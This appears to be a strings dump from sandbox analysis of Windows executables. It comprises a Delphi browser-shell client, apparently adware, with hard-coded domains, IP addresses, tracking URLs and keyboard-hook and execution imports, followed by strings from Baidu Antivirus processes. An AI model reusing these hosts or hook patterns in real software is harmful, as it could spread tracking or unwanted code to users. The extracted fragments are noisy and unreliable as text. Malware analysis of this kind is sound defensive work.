Unsuported variant data type: %d
STcpThread
tjj.mny8.cn
tjjwt.mny8.cn
tjjdx.mny8.cn
tjjt.mny8.cn
125.43.78.107
tjj.mnyb.net
222.88.93.109
IWebBrowserApp
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowser
TWebBrowsert
OnWindowSetResizablel
OnWindowSetTop
OnWindowSetWidthH
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
ou.mny8.com.cn
ou.mnyb.net
222.88.93.108
125.43.78.118
MAPI32.DLL
Uh.yJ
supports
importNode
gdiplus.dll
GdiplusShutdown
user32.dll
OnActionExecutex
rcmDefault
rcmDebug
DontExecuteScripts
DontExecuteJava
DontExecuteActiveX
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
PMsg
pguidCmdGroup
TTranslateUrlEvent
pchURLIn
ppchURLOut
CmdID
pszUrl
pszUrlContext
szPassWord
ErrorUrl
OptionKeyPath
OverrideOptionKeyPath
OnTranslateUrl
OnCommandExec
'%s' is not supported.
WebocPopupManagement
ValidateNavigateUrl
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
XmlHttp
https://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
\ieframe.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TKeyEventEx
Port
Password
poPortrait
OnKeyDownt
OnKeyUp
0.750000
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB http://bsalsa.com/
TOnPaintWebICOEvent
ScrollLeftPic<
OnPaintWebICO<
LinkUrl<
Fav%d.dat
Setup.ini
TFormLoginTips
LoginUrl
/WebShell
CMD:Login
CMD:Reg
CMD:Logout:
CMD:Close
Uh.IM
UnsupportedGdiplusVersion
PropertyNotSupported
aclBurlyWood
rpcrt4.dll
KERNEL32.DLL
GetDeskTopIcoPositionX64.exe
mvyy.exe
dtk.vsnis.com
lbldi.dat
Heatbeat.ini
acdat.dat
%ProgramFiles%\Internet Explorer\iexplore.exe
edi.dat
http://udd.mny8.com.cn:4518/tj?qid=
http://udd.mnyb.net:4518/tj?qid=
http://125.43.78.117:4518/tj?qid=
http://222.88.93.101:4518/tj?qid=
runa.ini
FormKeyPress
lblUrl
http://web.mny8.com/Handler/Handler.ashx?action=like&id=
http://web.mny8.com/fav.aspx?id=
favicon.ico
TMonochromeLookup
uWebBrowser
lblURL
lblURLClick
lblURLMouseEnter
lblURLMouseLeave
http://soft.mny8.com
TFormWebShow
frmWebShow
ShowWebForm:
TFormWebShow WebNavParms.URL:
TFormWebShow.wb1 not HandleAllocated
Act_Loginx
Act_MaxExecute
Act_MinExecute
Act_HomePageExecute
Act_ShowTrayExecute
Act_CloseExecute
Act_AboutExecute
Act_CloseOrTrayExecute
Act_CheckUpdateExecute
Act_AutoRunExecute
Act_ShowUserPnlExecute
Act_LoginExecute
Act_RegExecute
Act_RechargeExecute
Act_RefExecute
edtSearchKeyPress
http://www.mny8.com
http://web.mny8.com/Recharge.aspx
http://www.baidu.com
http://web.mny8.com/index.html?action=search&keyword=
/WebShell
/WebShell2
btns.js
http://web.mny8.com/json/btns1/btns.js
http://web.mny8.com/renwu.html?uid=
WMOpenWebUrl
http://web.mny8.com/json/task/task.js
TFormWebShowOnly
frmWebShowOnly
pTipsType:%d
ShellExecute
username=%s&taskid=%s&action=taskok
MnyingU.exe
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetKeyboardType
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutNameA
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
gdi32.dll
SetViewportOrgEx
version.dll
WinExec
GetCPInfo
CreatePipe
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
wininet.dll
InternetOpenUrlA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestA
HttpAddRequestHeadersA
ShellExecuteExA
ShellExecuteW
ShellExecuteA
comdlg32.dll
wsock32.dll
ws2_32.dll
iphlpapi.dll
msvcrt.dll
GdipGetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
GdipSetImageAttributesColorKeys
winmm.dll
4"4-4?4_4
? ?(?0?8?@?
4(424@4}4
=$=2=6=~=
=0>4>8><>
< <$<(<,<0<4<8<<<@<
6 6$6(6,6
>">&>*>.>
1"3&3*3.32363:3
1-282F2i2p2}2
1&1.161`1
='> >3>7><>
2 2(20282@2
3 3$3(3,3034383
6%6u6
3!3%3,3~3
8#8(8-8|8
5!6(6/666=6
9#: :/:4:
=">&>*>0>
4 4$4(4,4044484<4
; ;$;(;,;0;4;8;<;
stdole2.tlbWWW
:WebShell
mUrlsWWW
ShowWebFormW
TaUrl
urlW
licourlWW
-ShowUrlW
OpenUrlW
KeyW
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
.KBx=
.QaQU@q
K1j=%d
%fq'A
hf%ub
8%FqS
.JmgL
n.UZt
eK0%D
jt%xR
b%xhE
KWindows
USimpleTcp
7USimpleUdpClient
?HTTPApp
>WebConst
lfrmLoginTips
uMsgFilter
frmUserLogin
UPipeTransConst
UPipeTransClient
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
PNGImage.Data
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
Picture.Data
6z%ug
%uI"Q?
FormLoginTips
diTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        nWqU
Z.xeX`
%uB9oj
" id="W5M0MpCehiHzreSzNTczkc9d"?>        $
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
DialogBoxes.DisableAll
PrintOptions.Margins.Left
PrintOptions.Margins.Right
PrintOptions.Margins.Top
PrintOptions.Margins.Bottom
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
%.fE 
Constraints.MinHeight
Constraints.MinWidth
" id="W5M0MpCehiHzreSzNTczkc9d"?>        &V
" id="W5M0MpCehiHzreSzNTczkc9d"?>        T
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
TFormUserLogin
FormUserLogin
30]%S
EÞ,
Z.czN
Ce%x'x
.xCn>
.cx!Y
T.yj1
xZ<.ad
imgLoginBottom
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
?
btnLogin
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
btnLoginClick
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
lblQQLogin
lblQQLoginClick
lblQQLoginMouseEnter
lblQQLoginMouseLeave
edtRePass
edtPassKeyPress
edtUserKeyPress
edtPass
FormWebShow
DisableErrors.fpExceptions
HTMLCode.Strings
BtnImage.Data
BgPic.Data
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
FormWebShowOnly
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
PicBtnLeft.Data
PicBtnRight.Data
TabPic.Data
ScrollLeftPic.Data
ScrollRightPic.Data
CloseBtnPic.Data
MenuBtnPic.Data
NewBtnPic.Data
Act_Login
version="11.0.2902.10471"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
http://www.w3.org/2001/XMLSchema
errorUrl
{surl}
loginurl
keyword
{"key":"
TFORMLOGINTIPS
TFORMUSERLOGIN
TFORMWEBSHOW
TFORMWEBSHOWONLY
,Unsupported Application Extension block size
Unknown GIF block type'Object type not supported for operation
Unsupported PixelFormat
Invalid stream operation
Invalid extension introducerúiled to allocate memory for GIF DIB
Invalid Image trailerAInternal error: Extension Instance does not match Extension Label/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Error decoding URL style (%%XX) encoded string at position ÑInvalid URL encoded character (%s) at position %d&Cannot change the size of a JPEG image
JPEG error #%d
JPEG Image File)"%s" DOMImplementation already registered;Property or Method "%s" is not supported by DOM Vendor "%s"
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
UTF-7Ênnot remove shell notification iconÊnnot create shell notification icon"%s requires Windows Vista or later
OLE error %.8x.Method '%s' not supported by automation object
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
Information Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Unsupported clipboard format
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)"Unable to find a Table of Contents
No help found for %s#No context-sensitive help installed
Unable to write to %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid GUID value
I/O error %d
1.0.1011.1935
1.0.0.0

BaiduAnSvc.exe_3952:




.text
`.rdata
@.data
.rsrc
@.reloc
;9u.SWj
8.uwS
n<.ut
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
", which is not imported by "
$0$1 = $2
$0$1 $2 $3 = $4
.PLACEHOLDER_VALUE
.placeholder.proto
map key must name a scalar or string field.
map_key must not name a repeated field.
CHECK failed: dynamic.get() != NULL:
.foo = value".
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
Import "
Missing field: FileDescriptorProto.name.
File recursively imports itself:
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\extension_set.cc
CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
&#xX;
%s='%s'
%s="%s"
standalone="%s"
encoding="%s"
version="%s"
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
c:\clientci\workspace\bdm_v2.1_fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h
config_service.proto
.\BDMConfig\Protocol\config_service.pb.cc
config_service.proto"(
cmd_list
.ConfigItem"@
.ResultSet
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
RootKey
SubKey
IsNative64Key
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
c:\clientci\workspace\bdm_v2.1_fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDMSkin.dll
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
WaitNamedPipeW
SetNamedPipeHandleState
CreateNamedPipeW
ConnectNamedPipe
CreateIoCompletionPort
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegSetKeySecurity
RegEnumKeyExW
RegQueryInfoKeyW
RegNotifyChangeKeyValue
RegGetKeySecurity
RegDeleteKeyW
RegFlushKey
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHFileOperationW
SHELL32.dll
ole32.dll
MSVCP80.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCR80.dll
_amsg_exit
_crt_debugger_hook
USERENV.dll
WTSAPI32.dll
imagehlp.dll
BaiduAnSvc.exe
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AVCRtpPluginContainer@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AVCRTPServer@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVIPluginCmdExecutor@@
.?AUPluginInfoPassiveSaver@@
.PA_W
.?AVPipeServer@IPC@@
.?AVCIpcPipeServer@IPC@@
.?AVWorkerThread@PipeServer@IPC@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
ÿF=
4!4:4P4V45Q5j5
9“9C9b9z9
2%3s3
3<3R3a3
=(=4=@=\=
1$121;1@1
1 1(101<1`1
3$3,383\3|3
1 1$1(1,101
explorer.exe
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
winlogon.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
ntdll.dll
BaiduAnTray.exe
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
EXPLORER.EXE
BaiduAn.exe
BaiduAnUpdate.exe
BaiduAnBugRpt.exe
Global\BDMMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
Global\BDMEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
Global\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
\RTPPlugins\RtpContainerConfig.xml
C:\test.exe
d-d-d d:d:d d
d:d:d
%s(%d)
Last Error : %u(%s)
Global\BDMMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
BDMNet.dll
\kernel32.dll
Windows 8
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
Kernel32.dll
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
xxxxxxxxxxxxxxxx
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
JWintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
I\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
\\.\pipe\{0F98C369-2D5B-4445-8D05-42E727DEA4D5}
{X-X-X-XX-XXXXXX}
##cmd:
HPBPackCache.xml
BDMDownload.dll
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
BUninstalledPlugins.xml
SendLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}
/{0}/{1}/{2}
SendIpcMessage Begin, MSGID:{0}, TARGET:{1}
SendIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
PostIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
ForwardMessage - Forward Message, MsgId:{0}, FROM:/{1}/{2}/{3} TO {4}
ForwardMessage - Forward Message Failed, MsgId:{0}, FROM:/{1}/{2}/{3} TO {4}
/%d/%d/%d
FCreateNamedPipe
PipeServer::Run() - ConnectNamedPipe:
PipeServer::CreateListeningPipe Start Listen
PipeServer::Run() - GetOverlappedResult:
PipeServer::Run() - WaitForMultipleObjects:
PipeServer::Run() - Exception:
PipeServer::Run() - Unexpected exception
PipeServer::ReleaseTunnel()
PipeServer::WorkerThread::WriteCompleted - Tunnel write where not all data was written
PipeServer::Tunnel::Tunnel()
PipeServer::WorkerThread::Run() - Exception:
PipeServer::WorkerThread::Run() - Unexpected exception
PipeServer::WorkerThread::Run() - Unexpected operation
PipeServer::WorkerThread::Run() - Unexpected - pBuffer is 0
0 is an invalid value for completionKey
CIOCompletionPort::CIOCompletionPort() - CreateIoCompletionPort
CIOCompletionPort::AssociateDevice() - CreateIoCompletionPort
CIOCompletionPort::PostStatus() - PostQueuedCompletionStatus
CIOCompletionPort::GetStatus() - GetQueuedCompletionStatus
GD823ABCA-A92F-429d-9E11-3779B5F682AA
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
2.1.0.1214
BaiduanSvc.exe

BaiduAn.exe_3024:




.text
`.rdata
@.data
.rsrc
@.reloc
;9u.SWj
8.uwS
n<.ut
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
", which is not imported by "
$0$1 = $2
$0$1 $2 $3 = $4
.PLACEHOLDER_VALUE
.placeholder.proto
map key must name a scalar or string field.
map_key must not name a repeated field.
CHECK failed: dynamic.get() != NULL:
.foo = value".
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
Import "
Missing field: FileDescriptorProto.name.
File recursively imports itself:
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
..\src\google\protobuf\extension_set.cc
CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
c:\clientci\workspace\bdm_v2.1_fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h
config_service.proto
.\BDMConfig\Protocol\config_service.pb.cc
config_service.proto"(
cmd_list
.ConfigItem"@
.ResultSet
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
c:\clientci\workspace\bdm_v2.1_fix_compile\basic\Output\BinRelease\BaiduAn.pdb
GetWindowsDirectoryW
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
SHLWAPI.dll
USER32.dll
imagehlp.dll
BaiduAn.exe
.?AVCBDCmdParser@BDMLogicMisc@@
ÿF=
5X5f5
9*9,:0:4:8:<:}:
6%6S6a6
8%8X8
:#:5:\:|:
? ?$?(?,?0?4?8?
233F3
8#8-858B8S8f8}8
0(02070_0
BDCooly.dll
BDMMainframe.dll
@advapi32.dll
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
BDMNet.dll
EX
EWintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
2.1.0.1214
Baiduan.exe

BaiduAnTray.exe_3100:




.text
`.rdata
@.data
.rsrc
@.reloc
u%SVW
;9u.SWj
8.uwS
n<.ut
;:u.SWj
u.hhJQ
SSSSSh
L$.UQf
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
", which is not imported by "
$0$1 = $2
$0$1 $2 $3 = $4
.PLACEHOLDER_VALUE
.placeholder.proto
map key must name a scalar or string field.
map_key must not name a repeated field.
CHECK failed: dynamic.get() != NULL:
.foo = value".
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
Import "
Missing field: FileDescriptorProto.name.
File recursively imports itself:
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\extension_set.cc
